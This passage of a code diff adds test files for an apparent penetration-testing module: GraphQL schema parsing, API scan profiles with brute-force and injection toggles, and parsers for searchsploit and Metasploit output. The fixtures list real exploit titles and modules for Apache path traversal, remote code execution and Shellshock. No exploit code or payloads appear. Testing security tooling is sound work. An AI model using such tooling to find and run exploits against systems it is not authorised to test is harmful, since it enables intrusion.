+      expect(deleteMutation).toBeDefined()
+    })
+
+    test("filters out built-in types", () => {
+      const responseWithBuiltins = {
+        __schema: {
+          ...introspectionResponse.data.__schema,
+          types: [
+            ...introspectionResponse.data.__schema.types,
+            { name: "__Schema", kind: "OBJECT", fields: [] },
+            { name: "__Type", kind: "OBJECT", fields: [] },
+          ],
+        },
+      }
+
+      const spec = GraphQLParser.parse(responseWithBuiltins, "https://api.example.com/graphql")
+      expect(spec.graphqlSchema!.types.some((t) => t.name.startsWith("__"))).toBe(false)
+    })
+  })
+
+  describe("validation", () => {
+    test("isValidIntrospection returns true for valid responses", () => {
+      expect(GraphQLParser.isValidIntrospection(introspectionResponse)).toBe(true)
+      expect(GraphQLParser.isValidIntrospection(introspectionResponse.data)).toBe(true)
+    })
+
+    test("isValidIntrospection returns false for invalid responses", () => {
+      expect(GraphQLParser.isValidIntrospection({})).toBe(false)
+      expect(GraphQLParser.isValidIntrospection({ errors: [] })).toBe(false)
+      expect(GraphQLParser.isValidIntrospection("invalid")).toBe(false)
+    })
+
+    test("isIntrospectionEnabled detects enabled introspection", () => {
+      expect(GraphQLParser.isIntrospectionEnabled(introspectionResponse)).toBe(true)
+      expect(GraphQLParser.isIntrospectionEnabled({ errors: [{ message: "disabled" }] })).toBe(false)
+    })
+  })
+
+  describe("analyzeSecurityPatterns", () => {
+    test("detects sensitive fields", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+      const analysis = GraphQLParser.analyzeSecurityPatterns(spec.graphqlSchema!)
+
+      expect(analysis.hasSensitiveQueries).toBe(true)
+      expect(analysis.sensitiveFields.some((f) => f.includes("password"))).toBe(true)
+    })
+
+    test("detects deprecated fields", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+      const analysis = GraphQLParser.analyzeSecurityPatterns(spec.graphqlSchema!)
+
+      expect(analysis.hasDeprecatedFields).toBe(true)
+    })
+
+    test("identifies potential IDOR patterns", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+      const analysis = GraphQLParser.analyzeSecurityPatterns(spec.graphqlSchema!)
+
+      expect(analysis.potentialIssues.some((i) => i.includes("IDOR"))).toBe(true)
+    })
+  })
+
+  describe("formatSummary", () => {
+    test("formats schema summary", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+      const summary = GraphQLParser.formatSummary(spec.graphqlSchema!)
+
+      expect(summary).toContain("GraphQL Schema Summary")
+      expect(summary).toContain("Query Type: Query")
+      expect(summary).toContain("Mutation Type: Mutation")
+    })
+  })
+
+  describe("INTROSPECTION_QUERY", () => {
+    test("has valid introspection query", () => {
+      expect(GraphQLParser.INTROSPECTION_QUERY).toContain("__schema")
+      expect(GraphQLParser.INTROSPECTION_QUERY).toContain("queryType")
+      expect(GraphQLParser.INTROSPECTION_QUERY).toContain("types")
+    })
+  })
+})
+
+describe("ApiScanProfiles", () => {
+  test("has all required profiles", () => {
+    const profiles = ApiScanProfiles.list()
+
+    expect(profiles.length).toBe(7)
+    expect(ApiScanProfiles.get("discovery")).toBeDefined()
+    expect(ApiScanProfiles.get("quick")).toBeDefined()
+    expect(ApiScanProfiles.get("standard")).toBeDefined()
+    expect(ApiScanProfiles.get("thorough")).toBeDefined()
+    expect(ApiScanProfiles.get("passive")).toBeDefined()
+    expect(ApiScanProfiles.get("auth-focused")).toBeDefined()
+    expect(ApiScanProfiles.get("custom")).toBeDefined()
+  })
+
+  describe("profile configurations", () => {
+    test("discovery profile disables all tests", () => {
+      const profile = ApiScanProfiles.get("discovery")!
+
+      expect(profile.discovery.enabled).toBe(true)
+      expect(profile.authTests.enabled).toBe(false)
+      expect(profile.injectionTests.enabled).toBe(false)
+      expect(profile.bolaTests).toBe(false)
+    })
+
+    test("quick profile enables basic auth tests", () => {
+      const profile = ApiScanProfiles.get("quick")!
+
+      expect(profile.discovery.enabled).toBe(true)
+      expect(profile.authTests.enabled).toBe(true)
+      expect(profile.authTests.jwtAnalysis).toBe(true)
+      expect(profile.injectionTests.enabled).toBe(false)
+    })
+
+    test("standard profile enables core tests", () => {
+      const profile = ApiScanProfiles.get("standard")!
+
+      expect(profile.authTests.enabled).toBe(true)
+      expect(profile.injectionTests.enabled).toBe(true)
+      expect(profile.injectionTests.sql).toBe(true)
+      expect(profile.injectionTests.nosql).toBe(true)
+      expect(profile.injectionTests.command).toBe(false)
+      expect(profile.bolaTests).toBe(true)
+    })
+
+    test("thorough profile enables all tests", () => {
+      const profile = ApiScanProfiles.get("thorough")!
+
+      expect(profile.authTests.enabled).toBe(true)
+      expect(profile.authTests.bruteForce).toBe(true)
+      expect(profile.injectionTests.enabled).toBe(true)
+      expect(profile.injectionTests.sql).toBe(true)
+      expect(profile.injectionTests.nosql).toBe(true)
+      expect(profile.injectionTests.command).toBe(true)
+      expect(profile.bolaTests).toBe(true)
+      expect(profile.rateLimit).toBe(10)
+    })
+
+    test("passive profile disables active tests", () => {
+      const profile = ApiScanProfiles.get("passive")!
+
+      expect(profile.discovery.enabled).toBe(true)
+      expect(profile.discovery.commonPaths).toBe(false)
+      expect(profile.authTests.jwtAnalysis).toBe(true)
+      expect(profile.injectionTests.enabled).toBe(false)
+      expect(profile.bolaTests).toBe(false)
+    })
+
+    test("auth-focused profile focuses on auth testing", () => {
+      const profile = ApiScanProfiles.get("auth-focused")!
+
+      expect(profile.authTests.enabled).toBe(true)
+      expect(profile.authTests.jwtAnalysis).toBe(true)
+      expect(profile.authTests.apiKeyTest).toBe(true)
+      expect(profile.authTests.oauthTest).toBe(true)
+      expect(profile.authTests.bruteForce).toBe(true)
+      expect(profile.injectionTests.enabled).toBe(false)
+      expect(profile.bolaTests).toBe(true)
+    })
+  })
+
+  describe("createCustom", () => {
+    test("creates custom profile with overrides", () => {
+      const custom = ApiScanProfiles.createCustom("standard", {
+        injectionTests: { enabled: true, sql: false, nosql: false, command: true },
+        bolaTests: false,
+      })
+
+      expect(custom.id).toBe("custom")
+      expect(custom.injectionTests.sql).toBe(false)
+      expect(custom.injectionTests.command).toBe(true)
+      expect(custom.bolaTests).toBe(false)
+      expect(custom.authTests.enabled).toBe(true) // From base
+    })
+
+    test("preserves base profile nested settings", () => {
+      const custom = ApiScanProfiles.createCustom("thorough", {
+        timeout: 90000,
+      })
+
+      expect(custom.timeout).toBe(90000)
+      expect(custom.authTests.bruteForce).toBe(true) // From thorough base
+    })
+  })
+
+  describe("format", () => {
+    test("formats profile for display", () => {
+      const profile = ApiScanProfiles.get("standard")!
+      const formatted = ApiScanProfiles.format(profile)
+
+      expect(formatted).toContain("Profile: Standard")
+      expect(formatted).toContain("Auth Tests:")
+      expect(formatted).toContain("Injection Tests:")
+      expect(formatted).toContain("BOLA Tests: Yes")
+    })
+
+    test("formatTable produces markdown table", () => {
+      const table = ApiScanProfiles.formatTable()
+
+      expect(table).toContain("| Profile |")
+      expect(table).toContain("discovery")
+      expect(table).toContain("standard")
+      expect(table).toContain("thorough")
+    })
+  })
+})
+
+describe("ApiScanStorage", () => {
+  beforeEach(() => {
+    ApiScanStorage.clearMemory()
+  })
+
+  afterEach(() => {
+    ApiScanStorage.clearMemory()
+  })
+
+  describe("spec operations", () => {
+    test("saves and retrieves API spec", async () => {
+      const spec: Omit<ApiScanTypes.ApiSpec, "id"> = {
+        target: "https://api.example.com",
+        type: "openapi",
+        version: "3.0.0",
+        title: "Test API",
+        endpoints: [
+          {
+            id: "ep_1",
+            path: "/users",
+            method: "GET",
+            parameters: [],
+            responses: [],
+          },
+        ],
+        securitySchemes: [],
+        discoveredAt: Date.now(),
+      }
+
+      const saved = await ApiScanStorage.saveSpec(spec, { storage: "memory" })
+      expect(saved.id).toMatch(/^spec_/)
+
+      const retrieved = await ApiScanStorage.getSpec(saved.id, { storage: "memory" })
+      expect(retrieved).not.toBeNull()
+      expect(retrieved!.target).toBe("https://api.example.com")
+      expect(retrieved!.title).toBe("Test API")
+    })
+
+    test("lists specs with filters", async () => {
+      const spec1: Omit<ApiScanTypes.ApiSpec, "id"> = {
+        target: "https://api1.example.com",
+        type: "openapi",
+        endpoints: [],
+        securitySchemes: [],
+        discoveredAt: Date.now(),
+      }
+
+      const spec2: Omit<ApiScanTypes.ApiSpec, "id"> = {
+        target: "https://api2.example.com",
+        type: "graphql",
+        endpoints: [],
+        securitySchemes: [],
+        discoveredAt: Date.now() + 1000,
+      }
+
+      await ApiScanStorage.saveSpec(spec1, { storage: "memory" })
+      await ApiScanStorage.saveSpec(spec2, { storage: "memory" })
+
+      const all = await ApiScanStorage.listSpecs({ storage: "memory" })
+      expect(all.length).toBe(2)
+
+      const openapiOnly = await ApiScanStorage.listSpecs({ storage: "memory" }, { type: "openapi" })
+      expect(openapiOnly.length).toBe(1)
+      expect(openapiOnly[0].target).toBe("https://api1.example.com")
+
+      const graphqlOnly = await ApiScanStorage.listSpecs({ storage: "memory" }, { type: "graphql" })
+      expect(graphqlOnly.length).toBe(1)
+    })
+
+    test("deletes spec", async () => {
+      const spec: Omit<ApiScanTypes.ApiSpec, "id"> = {
+        target: "https://api.example.com",
+        type: "openapi",
+        endpoints: [],
+        securitySchemes: [],
+        discoveredAt: Date.now(),
+      }
+
+      const saved = await ApiScanStorage.saveSpec(spec, { storage: "memory" })
+      const deleted = await ApiScanStorage.deleteSpec(saved.id, { storage: "memory" })
+      expect(deleted).toBe(true)
+
+      const retrieved = await ApiScanStorage.getSpec(saved.id, { storage: "memory" })
+      expect(retrieved).toBeNull()
+    })
+
+    test("returns false when deleting non-existent spec", async () => {
+      const deleted = await ApiScanStorage.deleteSpec("nonexistent", { storage: "memory" })
+      expect(deleted).toBe(false)
+    })
+  })
+
+  describe("scan operations", () => {
+    test("saves and retrieves scan result", async () => {
+      const scan: Omit<ApiScanTypes.ApiScanResult, "id"> = {
+        target: "https://api.example.com",
+        profile: "standard",
+        endpoints: [],
+        findings: ["finding_1"],
+        stats: {
+          endpointsDiscovered: 10,
+          endpointsScanned: 10,
+          endpointsVulnerable: 2,
+          authTestsRun: 5,
+          injectionTestsRun: 20,
+          bolaTestsRun: 10,
+          findingsCount: 1,
+          criticalCount: 0,
+          highCount: 1,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 5000,
+        },
+        startedAt: Date.now(),
+        completedAt: Date.now(),
+        status: "completed",
+      }
+
+      const saved = await ApiScanStorage.saveScan(scan, { storage: "memory" })
+      expect(saved.id).toMatch(/^apiscan_/)
+
+      const retrieved = await ApiScanStorage.getScan(saved.id, { storage: "memory" })
+      expect(retrieved).not.toBeNull()
+      expect(retrieved!.profile).toBe("standard")
+    })
+
+    test("lists scans with filters", async () => {
+      const scan1: Omit<ApiScanTypes.ApiScanResult, "id"> = {
+        target: "https://api1.example.com",
+        profile: "quick",
+        endpoints: [],
+        findings: [],
+        stats: {
+          endpointsDiscovered: 0,
+          endpointsScanned: 0,
+          endpointsVulnerable: 0,
+          authTestsRun: 0,
+          injectionTestsRun: 0,
+          bolaTestsRun: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now(),
+        status: "completed",
+      }
+
+      const scan2: Omit<ApiScanTypes.ApiScanResult, "id"> = {
+        target: "https://api2.example.com",
+        profile: "standard",
+        endpoints: [],
+        findings: [],
+        stats: {
+          endpointsDiscovered: 0,
+          endpointsScanned: 0,
+          endpointsVulnerable: 0,
+          authTestsRun: 0,
+          injectionTestsRun: 0,
+          bolaTestsRun: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now() + 1000,
+        status: "failed",
+      }
+
+      await ApiScanStorage.saveScan(scan1, { storage: "memory" })
+      await ApiScanStorage.saveScan(scan2, { storage: "memory" })
+
+      const all = await ApiScanStorage.listScans({ storage: "memory" })
+      expect(all.length).toBe(2)
+
+      const quickOnly = await ApiScanStorage.listScans({ storage: "memory" }, { profile: "quick" })
+      expect(quickOnly.length).toBe(1)
+
+      const completed = await ApiScanStorage.listScans({ storage: "memory" }, { status: "completed" })
+      expect(completed.length).toBe(1)
+    })
+
+    test("deletes scan", async () => {
+      const scan: Omit<ApiScanTypes.ApiScanResult, "id"> = {
+        target: "https://api.example.com",
+        profile: "quick",
+        endpoints: [],
+        findings: [],
+        stats: {
+          endpointsDiscovered: 0,
+          endpointsScanned: 0,
+          endpointsVulnerable: 0,
+          authTestsRun: 0,
+          injectionTestsRun: 0,
+          bolaTestsRun: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now(),
+        status: "completed",
+      }
+
+      const saved = await ApiScanStorage.saveScan(scan, { storage: "memory" })
+      const deleted = await ApiScanStorage.deleteScan(saved.id, { storage: "memory" })
+      expect(deleted).toBe(true)
+
+      const retrieved = await ApiScanStorage.getScan(saved.id, { storage: "memory" })
+      expect(retrieved).toBeNull()
+    })
+  })
+
+  describe("memory management", () => {
+    test("clearMemory clears all buffers", async () => {
+      const spec: Omit<ApiScanTypes.ApiSpec, "id"> = {
+        target: "https://api.example.com",
+        type: "openapi",
+        endpoints: [],
+        securitySchemes: [],
+        discoveredAt: Date.now(),
+      }
+
+      const scan: Omit<ApiScanTypes.ApiScanResult, "id"> = {
+        target: "https://api.example.com",
+        profile: "quick",
+        endpoints: [],
+        findings: [],
+        stats: {
+          endpointsDiscovered: 0,
+          endpointsScanned: 0,
+          endpointsVulnerable: 0,
+          authTestsRun: 0,
+          injectionTestsRun: 0,
+          bolaTestsRun: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now(),
+        status: "completed",
+      }
+
+      await ApiScanStorage.saveSpec(spec, { storage: "memory" })
+      await ApiScanStorage.saveScan(scan, { storage: "memory" })
+
+      let counts = ApiScanStorage.memoryCount()
+      expect(counts.specs).toBe(1)
+      expect(counts.scans).toBe(1)
+
+      ApiScanStorage.clearMemory()
+
+      counts = ApiScanStorage.memoryCount()
+      expect(counts.specs).toBe(0)
+      expect(counts.scans).toBe(0)
+    })
+  })
+})
+
+describe("ApiScanTypes", () => {
+  test("validates HttpMethod", () => {
+    expect(ApiScanTypes.HttpMethod.parse("GET")).toBe("GET")
+    expect(ApiScanTypes.HttpMethod.parse("POST")).toBe("POST")
+    expect(() => ApiScanTypes.HttpMethod.parse("INVALID")).toThrow()
+  })
+
+  test("validates Status", () => {
+    expect(ApiScanTypes.Status.parse("pending")).toBe("pending")
+    expect(ApiScanTypes.Status.parse("running")).toBe("running")
+    expect(ApiScanTypes.Status.parse("completed")).toBe("completed")
+    expect(() => ApiScanTypes.Status.parse("invalid")).toThrow()
+  })
+
+  test("validates ProfileId", () => {
+    expect(ApiScanTypes.ProfileId.parse("discovery")).toBe("discovery")
+    expect(ApiScanTypes.ProfileId.parse("standard")).toBe("standard")
+    expect(ApiScanTypes.ProfileId.parse("auth-focused")).toBe("auth-focused")
+    expect(() => ApiScanTypes.ProfileId.parse("nonexistent")).toThrow()
+  })
+
+  test("validates OwaspApiCategory", () => {
+    expect(ApiScanTypes.OwaspApiCategory.parse("API1:2023-Broken_Object_Level_Authorization")).toBe(
+      "API1:2023-Broken_Object_Level_Authorization"
+    )
+    expect(ApiScanTypes.OwaspApiCategory.parse("API2:2023-Broken_Authentication")).toBe(
+      "API2:2023-Broken_Authentication"
+    )
+    expect(() => ApiScanTypes.OwaspApiCategory.parse("Invalid")).toThrow()
+  })
+
+  test("validates ApiEndpoint", () => {
+    const valid = ApiScanTypes.ApiEndpoint.parse({
+      id: "ep_123",
+      path: "/users/{id}",
+      method: "GET",
+      parameters: [{ name: "id", in: "path", required: true }],
+      responses: [{ statusCode: 200 }],
+    })
+
+    expect(valid.path).toBe("/users/{id}")
+    expect(valid.method).toBe("GET")
+    expect(valid.parameters[0].type).toBe("string") // Default
+  })
+
+  test("validates AuthConfig", () => {
+    const jwtAuth = ApiScanTypes.AuthConfig.parse({
+      type: "jwt",
+      token: "eyJ...",
+    })
+    expect(jwtAuth.type).toBe("jwt")
+
+    const apiKeyAuth = ApiScanTypes.AuthConfig.parse({
+      type: "apikey",
+      apiKey: { header: "X-API-Key", value: "secret" },
+    })
+    expect(apiKeyAuth.apiKey?.header).toBe("X-API-Key")
+  })
+
+  test("COMMON_API_PATHS includes standard paths", () => {
+    expect(ApiScanTypes.COMMON_API_PATHS).toContain("/openapi.json")
+    expect(ApiScanTypes.COMMON_API_PATHS).toContain("/swagger.json")
+    expect(ApiScanTypes.COMMON_API_PATHS).toContain("/api-docs")
+  })
+
+  test("COMMON_GRAPHQL_PATHS includes standard paths", () => {
+    expect(ApiScanTypes.COMMON_GRAPHQL_PATHS).toContain("/graphql")
+    expect(ApiScanTypes.COMMON_GRAPHQL_PATHS).toContain("/graphiql")
+  })
+})
diff --git a/packages/opencode/test/pentest/exploits.test.ts b/packages/opencode/test/pentest/exploits.test.ts
new file mode 100644
index 00000000000..4a40e3dd994
--- /dev/null
+++ b/packages/opencode/test/pentest/exploits.test.ts
@@ -0,0 +1,656 @@
+/**
+ * @fileoverview Exploit Framework Tests
+ *
+ * Tests for exploit search, matching, and storage.
+ */
+
+import { describe, test, expect, beforeEach } from "bun:test"
+import { SearchsploitParser } from "../../src/pentest/exploits/parsers/searchsploit"
+import { MetasploitParser } from "../../src/pentest/exploits/parsers/metasploit"
+import { ExploitMatcher } from "../../src/pentest/exploits/matcher"
+import { ExploitStorage } from "../../src/pentest/exploits/storage"
+import { ExploitTypes } from "../../src/pentest/exploits/types"
+import type { PentestTypes } from "../../src/pentest/types"
+
+// Sample searchsploit JSON output
+const SAMPLE_SEARCHSPLOIT_JSON = `{
+  "RESULTS_EXPLOIT": [
+    {
+      "Title": "Apache 2.4.49 - Path Traversal (CVE-2021-41773)",
+      "EDB-ID": "50383",
+      "Date": "2021-10-05",
+      "Author": "Dhiraj Mishra",
+      "Type": "webapps",
+      "Platform": "multiple",
+      "Path": "exploits/multiple/webapps/50383.sh",
+      "Codes": "CVE-2021-41773",
+      "Verified": "1"
+    },
+    {
+      "Title": "Apache 2.4.50 - Remote Code Execution (CVE-2021-42013)",
+      "EDB-ID": "50512",
+      "Date": "2021-10-07",
+      "Author": "Lucas Souza",
+      "Type": "webapps",
+      "Platform": "linux",
+      "Path": "exploits/linux/webapps/50512.py",
+      "Codes": "CVE-2021-42013"
+    }
+  ],
+  "RESULTS_SHELLCODE": []
+}`
+
+// Sample MSF search output
+const SAMPLE_MSF_SEARCH = `
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
+   1  exploit/linux/http/apache_path_traversal_rce    2021-10-05       excellent  Yes    Apache 2.4.49/2.4.50 Path Traversal RCE (CVE-2021-41773)
+   2  auxiliary/scanner/http/apache_normalize_path    2021-10-05       normal     No     Apache 2.4.49-50 Path Traversal Scanner
+`
+
+describe("SearchsploitParser", () => {
+  describe("parse", () => {
+    test("parses JSON output", () => {
+      const result = SearchsploitParser.parse(SAMPLE_SEARCHSPLOIT_JSON, "apache 2.4")
+
+      expect(result.exploits.length).toBe(2)
+      expect(result.exploits[0].id).toBe("50383")
+      expect(result.exploits[0].title).toContain("Apache 2.4.49")
+      expect(result.exploits[0].cve).toContain("CVE-2021-41773")
+      expect(result.exploits[0].verified).toBe(true)
+    })
+
+    test("parses text output", () => {
+      const textOutput = `
+----------------------------------------------------------------------------------------
+ Exploit Title                                      |  Path
+----------------------------------------------------------------------------------------
+Apache 2.4.49 - Path Traversal                     | exploits/multiple/webapps/50383.sh
+Apache 2.4.50 - RCE                                | exploits/linux/webapps/50512.py
+----------------------------------------------------------------------------------------
+`
+      const result = SearchsploitParser.parse(textOutput, "apache")
+
+      expect(result.exploits.length).toBe(2)
+      expect(result.exploits[0].id).toBe("50383")
+    })
+
+    test("extracts CVE from title", () => {
+      const result = SearchsploitParser.parse(SAMPLE_SEARCHSPLOIT_JSON, "apache")
+
+      expect(result.exploits[0].cve).toBeDefined()
+      expect(result.exploits[0].cve).toContain("CVE-2021-41773")
+    })
+  })
+
+  describe("format", () => {
+    test("formats output correctly", () => {
+      const result = SearchsploitParser.parse(SAMPLE_SEARCHSPLOIT_JSON, "apache")
+      const formatted = SearchsploitParser.format(result)
+
+      expect(formatted).toContain("Searchsploit Results")
+      expect(formatted).toContain("EXPLOITS")
+      expect(formatted).toContain("EDB-50383")
+      expect(formatted).toContain("CVE-2021-41773")
+    })
+
+    test("handles empty results", () => {
+      const result = SearchsploitParser.parse('{"RESULTS_EXPLOIT": []}', "nothing")
+      const formatted = SearchsploitParser.format(result)
+
+      expect(formatted).toContain("No exploits found")
+    })
+  })
+
+  describe("summarize", () => {
+    test("summarizes results", () => {
+      const result = SearchsploitParser.parse(SAMPLE_SEARCHSPLOIT_JSON, "apache")
+      const summary = SearchsploitParser.summarize(result)
+
+      expect(summary).toContain("2 exploit(s)")
+      expect(summary).toContain("1 verified")
+    })
+  })
+
+  describe("toMatches", () => {
+    test("generates matches with correct structure", () => {
+      const result = SearchsploitParser.parse(SAMPLE_SEARCHSPLOIT_JSON, "apache")
+      const matches = SearchsploitParser.toMatches(result, "finding_123", "CVE match", "high")
+
+      expect(matches.length).toBe(2)
+      expect(matches[0].findingID).toBe("finding_123")
+      expect(matches[0].source).toBe("exploit-db")
+      expect(matches[0].confidence).toBe("high")
+      expect(matches[0].url).toContain("exploit-db.com")
+    })
+  })
+})
+
+describe("MetasploitParser", () => {
+  describe("parseSearch", () => {
+    test("parses search output", () => {
+      const result = MetasploitParser.parseSearch(SAMPLE_MSF_SEARCH, "apache")
+
+      expect(result.modules.length).toBe(3)
+      expect(result.modules[0].name).toContain("apache_mod_cgi")
+      expect(result.modules[0].rank).toBe("excellent")
+      expect(result.modules[0].check).toBe(true)
+    })
+
+    test("extracts CVE from description", () => {
+      const result = MetasploitParser.parseSearch(SAMPLE_MSF_SEARCH, "apache")
+
+      // Module 1 contains CVE in description
+      const msfModule = result.modules.find((m) => m.name.includes("path_traversal"))
+      expect(msfModule?.cve).toContain("CVE-2021-41773")
+    })
+
+    test("identifies auxiliary modules", () => {
+      const result = MetasploitParser.parseSearch(SAMPLE_MSF_SEARCH, "apache")
+
+      const auxModule = result.modules.find((m) => m.name.includes("auxiliary"))
+      expect(auxModule?.type).toBe("auxiliary")
+    })
+  })
+
+  describe("format", () => {
+    test("formats output with grouping", () => {
+      const result = MetasploitParser.parseSearch(SAMPLE_MSF_SEARCH, "apache")
+      const formatted = MetasploitParser.format(result)
+
+      expect(formatted).toContain("Metasploit Search Results")
+      expect(formatted).toContain("MODULES")
+      expect(formatted).toContain("[excellent]")
+    })
+  })
+
+  describe("summarize", () => {
+    test("summarizes by type", () => {
+      const result = MetasploitParser.parseSearch(SAMPLE_MSF_SEARCH, "apache")
+      const summary = MetasploitParser.summarize(result)
+
+      expect(summary).toContain("3 MSF module(s)")
+    })
+  })
+
+  describe("toMatches", () => {
+    test("generates matches", () => {
+      const result = MetasploitParser.parseSearch(SAMPLE_MSF_SEARCH, "apache")
+      const matches = MetasploitParser.toMatches(result, "finding_123", "Service match", "medium")
+
+      expect(matches.length).toBe(3)
+      expect(matches[0].source).toBe("metasploit")
+      expect(matches[0].rank).toBe("excellent")
+    })
+  })
+})
+
+describe("ExploitTypes", () => {
+  describe("ExploitMatch schema", () => {
+    test("validates valid match", () => {
+      const match: ExploitTypes.ExploitMatch = {
+        id: "match_123",
+        findingID: "finding_456",
+        source: "exploit-db",
+        exploitID: "50383",
+        title: "Apache Path Traversal",
+        confidence: "high",
+        matchReason: "CVE match",
+        createdAt: Date.now(),
+        status: "suggested",
+      }
+
+      const parsed = ExploitTypes.ExploitMatch.parse(match)
+      expect(parsed.id).toBe("match_123")
+      expect(parsed.confidence).toBe("high")
+    })
+
+    test("rejects invalid confidence", () => {
+      const match = {
+        id: "match_123",
+        findingID: "finding_456",
+        source: "exploit-db",
+        exploitID: "50383",
+        title: "Test",
+        confidence: "invalid",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }
+
+      expect(() => ExploitTypes.ExploitMatch.parse(match)).toThrow()
+    })
+  })
+
+  describe("ExploitRank enum", () => {
+    test("validates valid ranks", () => {
+      expect(ExploitTypes.ExploitRank.parse("excellent")).toBe("excellent")
+      expect(ExploitTypes.ExploitRank.parse("good")).toBe("good")
+      expect(ExploitTypes.ExploitRank.parse("manual")).toBe("manual")
+    })
+
+    test("rejects invalid rank", () => {
+      expect(() => ExploitTypes.ExploitRank.parse("super")).toThrow()
+    })
+  })
+
+  describe("SearchsploitEntry schema", () => {
+    test("validates entry with all fields", () => {
+      const entry: ExploitTypes.SearchsploitEntry = {
+        id: "50383",
+        title: "Apache 2.4.49 Path Traversal",
+        path: "exploits/multiple/webapps/50383.sh",
+        cve: ["CVE-2021-41773"],
+        verified: true,
+        type: "webapps",
+        platform: "linux",
+      }
+
+      const parsed = ExploitTypes.SearchsploitEntry.parse(entry)
+      expect(parsed.cve).toContain("CVE-2021-41773")
+    })
+
+    test("validates entry with minimal fields", () => {
+      const entry = {
+        id: "123",
+        title: "Test",
+        path: "/test",
+      }
+
+      const parsed = ExploitTypes.SearchsploitEntry.parse(entry)
+      expect(parsed.id).toBe("123")
+    })
+  })
+})
+
+describe("ExploitStorage", () => {
+  beforeEach(() => {
+    ExploitStorage.clearMemory()
+  })
+
+  describe("saveMatch", () => {
+    test("saves and retrieves match", async () => {
+      const match: ExploitTypes.ExploitMatch = {
+        id: "match_test",
+        findingID: "finding_123",
+        source: "exploit-db",
+        exploitID: "50383",
+        title: "Test Exploit",
+        confidence: "high",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }
+
+      await ExploitStorage.saveMatch(match, { storage: "memory" })
+      const retrieved = await ExploitStorage.getMatch("match_test", { storage: "memory" })
+
+      expect(retrieved).toBeDefined()
+      expect(retrieved!.title).toBe("Test Exploit")
+    })
+
+    test("generates ID if not provided", async () => {
+      const match = {
+        findingID: "finding_123",
+        source: "exploit-db" as const,
+        exploitID: "50383",
+        title: "Test",
+        confidence: "high" as const,
+        matchReason: "Test",
+        status: "suggested" as const,
+      }
+
+      const saved = await ExploitStorage.saveMatch(match, { storage: "memory" })
+
+      expect(saved.id).toBeDefined()
+      expect(saved.id.startsWith("match_")).toBe(true)
+      expect(saved.createdAt).toBeDefined()
+    })
+  })
+
+  describe("listMatches", () => {
+    test("lists all matches", async () => {
+      await ExploitStorage.saveMatch({
+        id: "match_1",
+        findingID: "finding_a",
+        source: "exploit-db",
+        exploitID: "1",
+        title: "Exploit 1",
+        confidence: "high",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      await ExploitStorage.saveMatch({
+        id: "match_2",
+        findingID: "finding_b",
+        source: "metasploit",
+        exploitID: "2",
+        title: "Exploit 2",
+        confidence: "medium",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      const allMatches = await ExploitStorage.listMatches({ storage: "memory" })
+      expect(allMatches.length).toBe(2)
+    })
+
+    test("filters by source", async () => {
+      await ExploitStorage.saveMatch({
+        id: "match_1",
+        findingID: "finding_a",
+        source: "exploit-db",
+        exploitID: "1",
+        title: "Exploit 1",
+        confidence: "high",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      await ExploitStorage.saveMatch({
+        id: "match_2",
+        findingID: "finding_b",
+        source: "metasploit",
+        exploitID: "2",
+        title: "Exploit 2",
+        confidence: "medium",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      const edbMatches = await ExploitStorage.listMatches(
+        { storage: "memory" },
+        { source: "exploit-db" }
+      )
+      expect(edbMatches.length).toBe(1)
+      expect(edbMatches[0].source).toBe("exploit-db")
+    })
+
+    test("filters by findingID", async () => {
+      await ExploitStorage.saveMatch({
+        id: "match_1",
+        findingID: "finding_a",
+        source: "exploit-db",
+        exploitID: "1",
+        title: "Exploit 1",
+        confidence: "high",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      await ExploitStorage.saveMatch({
+        id: "match_2",
+        findingID: "finding_b",
+        source: "metasploit",
+        exploitID: "2",
+        title: "Exploit 2",
+        confidence: "medium",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      const filtered = await ExploitStorage.listMatches(
+        { storage: "memory" },
+        { findingID: "finding_a" }
+      )
+      expect(filtered.length).toBe(1)
+      expect(filtered[0].findingID).toBe("finding_a")
+    })
+  })
+
+  describe("updateMatchStatus", () => {
+    test("updates status", async () => {
+      await ExploitStorage.saveMatch({
+        id: "match_status",
+        findingID: "finding_123",
+        source: "exploit-db",
+        exploitID: "50383",
+        title: "Test",
+        confidence: "high",
+        matchReason: "Test",
+        createdAt: Date.now(),
+        status: "suggested",
+      }, { storage: "memory" })
+
+      const updated = await ExploitStorage.updateMatchStatus(
+        "match_status",
+        "verified",
+        { storage: "memory" }
+      )
+
+      expect(updated).toBeDefined()
